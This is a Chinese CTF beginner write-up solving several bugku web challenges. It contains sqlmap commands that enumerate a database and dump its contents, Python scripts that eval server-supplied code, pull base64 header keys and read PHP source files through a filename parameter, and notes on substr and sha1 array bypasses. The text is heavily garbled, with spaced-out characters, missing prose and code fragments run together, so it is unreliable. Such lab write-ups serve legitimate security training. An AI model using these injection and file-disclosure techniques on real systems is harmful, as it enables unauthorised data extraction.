[20976] 2020-04-23_【CTFweb入门第六篇】web入门

文档创建者:s7ckTeam
浏览次数:6
最后更新:2025-01-18
2020-04-23_【CTFweb入门第六篇】web入门 C T F   w e b w e b L e m o n S e c   2 0 2 0 - 0 4 - 2 3 b u g k u - c t f   h t t p : / / 1 2 3 . 2 0 6 . 8 7 . 2 4 0 : 8 0 0 2 / c h e n g j i d a n / s q l B u r p s u i t e 1 . t x t s q l m a p 使 s q l m a p s q l m a p 使 s q l m a p . p y   - r   1 . t x t   - p   i d   c u r r e n t - d b - r   >     - p   >   c u r r e n t - d b   > c u r r e n t -   s k c t f _ f l a g ,  
s q l m a p . p y   - r   1 . t x t   - p   i d   - D   s k c t f _ f l a g   - - t a b l e s   - D   >   t a b l e s   > ( t a b l e s - )   f l a g f l 4 g   s q l m a p . p y   - r   1 . t x t   - p   i d   - D   s k c t f _ f l a g   - T   f l 4 g - - c o l u m n s   - T   >   c o l u m n s   >   f l 4 g s k c t f _ f l a g   s q l m a p . p y   - r   1 . t x t   - p   i d   - D   s k c t f _ f l a g   - T   f l 4 g   - C   s k c t f _ f l a g   - - d u m p   d u m p   > ( d u m p - )   B U G K U { S q l _ I N J E C T 0 N _ 4 8 1 3 d r d 8 h z 4 }   s q l   b u g k u - c t f  
2   i m p o r t   r e i m p o r t   r e q u e s t s   s   =   r e q u e s t s . S e s s i o n ( ) r   =   s . g e t ( " h t t p : / / 1 2 0 . 2 4 . 8 6 . 1 4 5 : 8 0 0 2 / q i u m i n g s h a n / " ) s e a r c h O b j   =   r e . s e a r c h ( r ' ^ < d i v > ( . * ) = ? ; < / d i v > $ ' ,   r . t e x t , r e . M   |   r e . S ) d   =   {         " v a l u e " : e v a l ( s e a r c h O b j . g r o u p ( 1 ) ) } r   =   s . p o s t ( " h t t p : / / 1 2 0 . 2 4 . 8 6 . 1 4 5 : 8 0 0 2 / q i u m i n g s h a n / " ,   d a t a = d ) p r i n t ( r . t e x t )   i m p o r t   r e                   #   i m p o r t           r e     i m p o r t   r e q u e s t s         # r e q u e s t s     s   =   r e q u e s t s . S e s s i o n ( )     #   s s e s s i o n   s e s s i o n c o o k i e     s e s s i o n     s     r   = s . g e t ( " h t t p : / / 1 2 0 . 2 4 . 8 6 . 1 4 5 : 8 0 0 2 / q i u m i n g s h a n / " )         # u r l   s e a r c h O b j   = r e . s e a r c h ( r ' ^ < d i v > ( . * ) = ? ; < / d i v > $ ' ,   r . t e x t ,   r e . M   |   r e . S )       # s e a r c h     n o n e   r e . s e a r c h ( )       r ' ^ < d i v > ( . * ) = ? ; < / d i v > $ ' r r ^ $ < d i v > < / d i v > ( . * ) . * . * ? =   r ' ^ < d i v > ( . * ) = ? ; < / d i v > $ ' < d i v > < / d i v > r . t e x t  
d   =   {       " v a l u e " :   e v a l ( s e a r c h O b j . g r o u p ( 1 ) )     # e v a l } r   = s . p o s t ( " h t t p : / / 1 2 0 . 2 4 . 8 6 . 1 4 5 : 8 0 0 2 / q i u m i n g s h a n / " ,   d a t a = d )         # p o s t p r i n t ( r . t e x t )     #   f l a g b u g k u - c t f   m a r g i n f l a g  
b a s e 6 4 b a s e 6 4 #   c o d i n g : u t f - 8 i m p o r t   r e q u e s t s i m p o r t   b a s e 6 4 u r l = " h t t p : / / 1 2 3 . 2 0 6 . 8 7 . 2 4 0 : 8 0 0 2 / w e b 6 / " s = r e q u e s t s . S e s s i o n ( ) h e a d = s . g e t ( u r l ) . h e a d e r s f l a g = b a s e 6 4 . b 6 4 d e c o d e ( h e a d [ " f l a g " ] ) f l a g = f l a g . d e c o d e ( ) k e y = b a s e 6 4 . b 6 4 d e c o d e ( f l a g . s p l i t ( " : " ) [ 1 ] ) p a y l o a d = { " m a r g i n " : k e y } p r i n t ( s . p o s t ( u r l , d a t a = p a y l o a d ) . t e x t )   r e q u e s t s P o s t B a s e 6 4   b u g k u - c t f   c o o k i e s
u r l   a 2 V 5 c y 5 0 e H Q =   b a s e 6 4 k e y s . t x t   f i l e n a m e 访 i n d e x . p h p u r l 使 b a s e 6 4 i n d e x . p h p l i n e   l i n e = 2 l i n e = 3 i n d e x . p h p   i m p o r t   r e q u e s t s a = 3 0 f o r   i   i n   r a n g e ( a ) :       u r l = " h t t p : / / 1 2 0 . 2 4 . 8 6 . 1 4 5 : 8 0 0 2 / w e b 1 1 / i n d e x . p h p ? l i n e = " + s t r ( i ) + " & f i l e n a m e = a W 5 k Z X g u c G h w "       s = r e q u e s t s . g e t ( u r l )       p r i n t   s . t e x t    
c o o k i e m a r g i n = m a r g i n 访 k e y s . p h p k e y s . p h p a 2 V 5 c y 5 w a H A =   K E Y { k e y _ k e y s }   b u g k u - c t f   n e v e r   g i v e   u p
1 p . h t m l 访   1 p . h t m l       h t t p : / / w w w . b u g k u . c o m /   w i n d o w . l o c a t i o n . h r e f   1 p . h t m l v i e w - s o u r c e : / / 1 2 0 . 2 4 . 8 6 . 1 4 5 : 8 0 0 6 / t e s t / 1 p . h t m l   % 3 C W o r d s u r l   b a s e 6 4 b a s e 6 4 v i e w - s o u r c e : h t t p :
s t r i p o s ( a b )   b a f i l e _ g e t _ c o n t e n t s   s t r l e n ( )   s u b s t r ( )   s u b s t r ( s t r i n g , s t a r t , l e n g t h )   l e n g t h     s u b s t r ( $ b , 0 , 1 )     b   0 1   e r e g i ( " 1 1 1 " . s u b s t r ( $ b , 0 , 1 ) , " 1 1 1 4 " )         " 1 1 1 4 " " 1 1 1 " . s u b s t r ( $ b , 0 , 1 )   a " b u g k u   i s   a   n i c e   p l a t e f o r m ! " i d 0     b 5 " 1 1 1 4 " " 1 1 1 " . s u b s t r ( $ b , 0 , 1 ) s u b s t r ( $ b , 0 , 1 ) 4       f 4 l 2 a 3 g . t x t   访   f 4 l 2 a 3 g . t x t     访 f l a g f l a g { t H i s _ i S _ T H e _ f L a G } S Q L s q l m a p 使 使 p y t h o n b u r p s u i t e 使 使 u r l b a s e 6 4 b u g k u - c t f  
  使 u n a m e s h a 1 p a s s w d s h a 1     h t t p : / / 1 2 3 . 2 0 6 . 8 7 . 2 4 0 : 8 0 0 2 / w e b 7 / ? u n a m e [ ] = 1 & i d = m a r g i n         p a s s w d [ ] = 2   p o s t d a t a               h a c k b a r  
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则